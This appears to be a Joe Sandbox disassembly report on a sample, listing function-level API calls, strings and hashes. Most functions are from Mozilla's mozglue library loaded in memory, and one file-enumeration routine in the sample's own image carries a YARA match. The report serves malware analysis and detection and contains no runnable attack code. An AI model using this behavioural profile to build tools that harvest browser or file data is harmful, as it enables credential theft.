Function 6CAE5440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6CAE5492
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CAE54A8
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CAE54BE
__Init_thread_footer.LIBCMT ref: 6CAE54DB

Part of subcall function 6CB0AB3F: EnterCriticalSection.KERNEL32(6CB5E370,?,?,6CAD3527,6CB5F6CC,?,?,?,?,?,?,?,?,6CAD3284), ref: 6CB0AB49
Part of subcall function 6CB0AB3F: LeaveCriticalSection.KERNEL32(6CB5E370,?,6CAD3527,6CB5F6CC,?,?,?,?,?,?,?,?,6CAD3284,?,?,6CAF56F6), ref: 6CB0AB7C

Part of subcall function 6CB0CBE8: GetCurrentProcess.KERNEL32(?,6CAD31A7), ref: 6CB0CBF1
Part of subcall function 6CB0CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CAD31A7), ref: 6CB0CBFA

GetCurrentThreadId.KERNEL32 ref: 6CAE54F9
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6CAE5516
GetCurrentThreadId.KERNEL32 ref: 6CAE556A
AcquireSRWLockExclusive.KERNEL32(6CB5F4B8), ref: 6CAE5577
moz_xmalloc.MOZGLUE(00000070), ref: 6CAE5585
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6CAE5590
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6CAE55E6
ReleaseSRWLockExclusive.KERNEL32(6CB5F4B8), ref: 6CAE5606
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CAE5616

Part of subcall function 6CB0AB89: EnterCriticalSection.KERNEL32(6CB5E370,?,?,?,6CAD34DE,6CB5F6CC,?,?,?,?,?,?,?,6CAD3284), ref: 6CB0AB94
Part of subcall function 6CB0AB89: LeaveCriticalSection.KERNEL32(6CB5E370,?,6CAD34DE,6CB5F6CC,?,?,?,?,?,?,?,6CAD3284,?,?,6CAF56F6), ref: 6CB0ABD1

GetCurrentThreadId.KERNEL32 ref: 6CAE563E
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CAE5646
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6CAE567C
free.MOZGLUE(?), ref: 6CAE56AE

Part of subcall function 6CAF5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CAF5EDB
Part of subcall function 6CAF5E90: memset.VCRUNTIME140(6CB37765,000000E5,55CCCCCC), ref: 6CAF5F27
Part of subcall function 6CAF5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CAF5FB2

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6CAE56E8
GetCurrentThreadId.KERNEL32 ref: 6CAE5707
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6CAE570F
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6CAE5729
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6CAE574E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6CAE576B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6CAE5796
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6CAE57B3
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6CAE57CA

Strings

- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6CAE5D1C
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CAE54A3
- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6CAE5D01
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6CAE5791
MOZ_BASE_PROFILER_LOGGING, xrefs: 6CAE54B9
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CAE548D
MOZ_PROFILER_STARTUP, xrefs: 6CAE55E1
- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6CAE5D24
[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6CAE5B38
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6CAE57C5
MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6CAE57AE
[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6CAE5C56
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6CAE5724
MOZ_BASE_PROFILER_HELP, xrefs: 6CAE5511
- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6CAE5D2B
- MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6CAE5CF9
GeckoMain, xrefs: 6CAE5554, 6CAE55D5
MOZ_PROFILER_STARTUP_DURATION, xrefs: 6CAE5749
[I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6CAE5BBE
MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6CAE56E3
[I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6CAE5717
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6CAE5AC9
[I %d/%d] profiler_init, xrefs: 6CAE564E
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6CAE584E
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6CAE5766

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
API String ID: 3686969729-1266492768
Opcode ID: 51cd60b8bb6176456f20ea3eb0d33e9a117ee55b0a1b91f56571321e10b4c88b
Instruction ID: 4114c2996a2e754869f2efee0f4bd50674575deb398cb4660d54315b1e3d8636
Opcode Fuzzy Hash: 51cd60b8bb6176456f20ea3eb0d33e9a117ee55b0a1b91f56571321e10b4c88b
Instruction Fuzzy Hash: A2224974A043809FEB00AF75E45426EB7F5EF4A35CF884929E84697B41EB30C498DB93

Function 6CAE6C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CAE6CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CAE6D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6CAE6D26

Part of subcall function 6CAECA10: malloc.MOZGLUE(?), ref: 6CAECA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6CAE6D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CAE6D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6CAE6D73
free.MOZGLUE(00000000), ref: 6CAE6D80
CertGetNameStringW.CRYPT32 ref: 6CAE6DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6CAE6DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CAE6DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6CAE6DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6CAE6E10
CryptMsgClose.CRYPT32(00000000), ref: 6CAE6E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6CAE6E34
CreateFileW.KERNEL32 ref: 6CAE6EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6CAE6F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CAE6F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6CAE709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CAE7103
free.MOZGLUE(00000000), ref: 6CAE7153
CloseHandle.KERNEL32(?), ref: 6CAE7176
__Init_thread_footer.LIBCMT ref: 6CAE7209
__Init_thread_footer.LIBCMT ref: 6CAE723A
__Init_thread_footer.LIBCMT ref: 6CAE726B
__Init_thread_footer.LIBCMT ref: 6CAE729C
__Init_thread_footer.LIBCMT ref: 6CAE72DC
__Init_thread_footer.LIBCMT ref: 6CAE730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6CAE73C2
VerSetConditionMask.NTDLL ref: 6CAE73F3
VerSetConditionMask.NTDLL ref: 6CAE73FF
VerSetConditionMask.NTDLL ref: 6CAE7406
VerSetConditionMask.NTDLL ref: 6CAE740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CAE741A
moz_xmalloc.MOZGLUE(?), ref: 6CAE755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CAE7568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6CAE7585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CAE7598
free.MOZGLUE(00000000), ref: 6CAE75AC

Part of subcall function 6CB0AB89: EnterCriticalSection.KERNEL32(6CB5E370,?,?,?,6CAD34DE,6CB5F6CC,?,?,?,?,?,?,?,6CAD3284), ref: 6CB0AB94
Part of subcall function 6CB0AB89: LeaveCriticalSection.KERNEL32(6CB5E370,?,6CAD34DE,6CB5F6CC,?,?,?,?,?,?,?,6CAD3284,?,?,6CAF56F6), ref: 6CB0ABD1

Strings

wintrust.dll, xrefs: 6CAE72CD
CryptCATAdminReleaseCatalogContext, xrefs: 6CAE72C8
(, xrefs: 6CAE768A
SHA256, xrefs: 6CAE6EC0

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: 495f2f3b49940eaf1b14fe1a310dda1749d73f2eae72d1a8631c4a8422466c9f
Instruction ID: ef26cb055b5627317f628faab696308cdc4fa5b557dcbce092a2d2fd275f7cc7
Opcode Fuzzy Hash: 495f2f3b49940eaf1b14fe1a310dda1749d73f2eae72d1a8631c4a8422466c9f
Instruction Fuzzy Hash: 5052E4B1A003589BEB21DF64CC84BAAB7B8EF49718F144599E909D7641DB70AEC4CF90

Function 6CB10DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CB10F1F
LeaveCriticalSection.KERNEL32(?), ref: 6CB10F99
memcpy.VCRUNTIME140(?,?,?), ref: 6CB10FB7
EnterCriticalSection.KERNEL32(?), ref: 6CB10FE9
memset.VCRUNTIME140(?,000000E5,00000000), ref: 6CB11031
LeaveCriticalSection.KERNEL32(?), ref: 6CB110D0
EnterCriticalSection.KERNEL32(?), ref: 6CB1117D
memset.VCRUNTIME140(?,000000E5,?), ref: 6CB11C39
EnterCriticalSection.KERNEL32(6CB5E744), ref: 6CB13391
LeaveCriticalSection.KERNEL32(6CB5E744), ref: 6CB133CD
LeaveCriticalSection.KERNEL32(?), ref: 6CB13431
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CB13437

Strings

MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6CB13793
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6CB137BD
MOZ_RELEASE_ASSERT(mNode), xrefs: 6CB13559, 6CB1382D, 6CB13848
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6CB137A8
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6CB137D2
MALLOC_OPTIONS, xrefs: 6CB135FE
Compile-time page size does not divide the runtime one., xrefs: 6CB13946
<jemalloc>, xrefs: 6CB13941, 6CB139F1
: (malloc) Unsupported character in malloc options: ', xrefs: 6CB13A02
MOZ_CRASH(), xrefs: 6CB13950

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3040639385-4173974723
Opcode ID: aa2cfdb1f155d3faaa46b2ed677e7a0f8d2965f1c0e2131609f4b11efb32bc78
Instruction ID: 2f56522ddd31cda09d4bf91bbc979aeb3b4ccc36038fa736006d349e41bf8653
Opcode Fuzzy Hash: aa2cfdb1f155d3faaa46b2ed677e7a0f8d2965f1c0e2131609f4b11efb32bc78
Instruction Fuzzy Hash: 14538071A097818FD704CF29C540616FBE1FF86328F29C66DE8699BB91D771E841CB82

Function 6CB334A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON

Download Yara Rule

APIs

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB33527
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB3355B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB335BC
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB335E0
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB3363A
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB33693
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB336CD
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB33703
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB3373C
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB33775
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB3378F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB33892
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB338BB
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB33902
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB33939
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB33970
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB339EF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB33A26
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB33AE5
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB33E85
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB33EBA
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB33EE2

Part of subcall function 6CB36180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6CB361DD
Part of subcall function 6CB36180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6CB3622C

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB340F9
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB3412F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB34157

Part of subcall function 6CB36180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CB36250
Part of subcall function 6CB36180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CB36292

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB3441B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CB34448
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CB3484E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CB34863
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CB34878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CB34896
free.MOZGLUE ref: 6CB3489F

Strings

, xrefs: 6CB34CD2

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: floor$free$malloc$memcpy
String ID:
API String ID: 3842999660-3916222277
Opcode ID: 3eb967c8c17009ea94fcc5b21d1a59d3c94ca4875ffc5b3f270a5e99427d7dcb
Instruction ID: 6f200d8e190a2f31205981029ca13bc7c700aeefbfc742e06f1e4c61423d4f3c
Opcode Fuzzy Hash: 3eb967c8c17009ea94fcc5b21d1a59d3c94ca4875ffc5b3f270a5e99427d7dcb
Instruction Fuzzy Hash: 79F23974908B908FC725CF28C08469AFBF1FF89348F518A5ED99997715DB329886CF42

Function 6CAE64C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6CAE64DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6CAE64F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6CAE6505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6CAE6518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6CAE652B
memcpy.VCRUNTIME140(?,?,?), ref: 6CAE671C
GetCurrentProcess.KERNEL32 ref: 6CAE6724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CAE672F
GetCurrentProcess.KERNEL32 ref: 6CAE6759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CAE6764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6CAE6A80
GetSystemInfo.KERNEL32(?), ref: 6CAE6ABE
__Init_thread_footer.LIBCMT ref: 6CAE6AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CAE6AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CAE6AF7

Strings

user32.dll, xrefs: 6CAE6526
detoured.dll, xrefs: 6CAE64DA
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6CAE6798
nvdxgiwrap.dll, xrefs: 6CAE6513
_etoured.dll, xrefs: 6CAE64ED
nvd3d9wrap.dll, xrefs: 6CAE6500

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: 4ced872201d835f5021c217eb85459aa6806106646d7013a570c77142d9202d4
Instruction ID: 2caf1b6c92c89ffe3db899fe67e795fc48a956e095e3118a0d4d451dad08a7c8
Opcode Fuzzy Hash: 4ced872201d835f5021c217eb85459aa6806106646d7013a570c77142d9202d4
Instruction Fuzzy Hash: E9F1E270A0522D8FDB20DF64CC48B9AB7B5AF0A318F184699D919A3741E731AEC4DF90

Function 00AC38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00AC38CC
FindFirstFileA.KERNEL32(?,?), ref: 00AC38E3
lstrcat.KERNEL32(?,?), ref: 00AC3935
StrCmpCA.SHLWAPI(?,00AD0F70), ref: 00AC3947
StrCmpCA.SHLWAPI(?,00AD0F74), ref: 00AC395D
FindNextFileA.KERNEL32(000000FF,?), ref: 00AC3C67
FindClose.KERNEL32(000000FF), ref: 00AC3C7C

Strings

%s\*, xrefs: 00AC38C0
%s\%s, xrefs: 00AC3A6F
%s\%s\%s, xrefs: 00AC3A4A
%s%s, xrefs: 00AC3AAD
%s\%s, xrefs: 00AC397A

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: 7f65f0911b1d56d2e1ac3ca6c515ba8af4f47f01fd4aeb6babf2f0476cd72337
Instruction ID: 87aeb1bf9b8ef7a296a540e5c5ec31329bf6569777ca6cd7917bfe33ed328b94
Opcode Fuzzy Hash: 7f65f0911b1d56d2e1ac3ca6c515ba8af4f47f01fd4aeb6babf2f0476cd72337
Instruction Fuzzy Hash: 5EA122B2900218ABDB24DF64DD85FFE7378BB48700F44858DB60D96141EB759B84CF62

Function 6CB3C4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CB3C5F9
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CB3C6FB
memset.VCRUNTIME140(?,00000000,00004008), ref: 6CB3C74D
memset.VCRUNTIME140(?,00000000,00004008), ref: 6CB3C7DE
memset.VCRUNTIME140(?,00000000,00004014), ref: 6CB3C9D5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CB3CC76
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CB3CD7A
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CB3DB40
memcpy.VCRUNTIME140(?,?,?), ref: 6CB3DB62
memcpy.VCRUNTIME140(?,?,?), ref: 6CB3DB99
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CB3DD8B
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CB3DE95
memcpy.VCRUNTIME140(?,?,?), ref: 6CB3E360
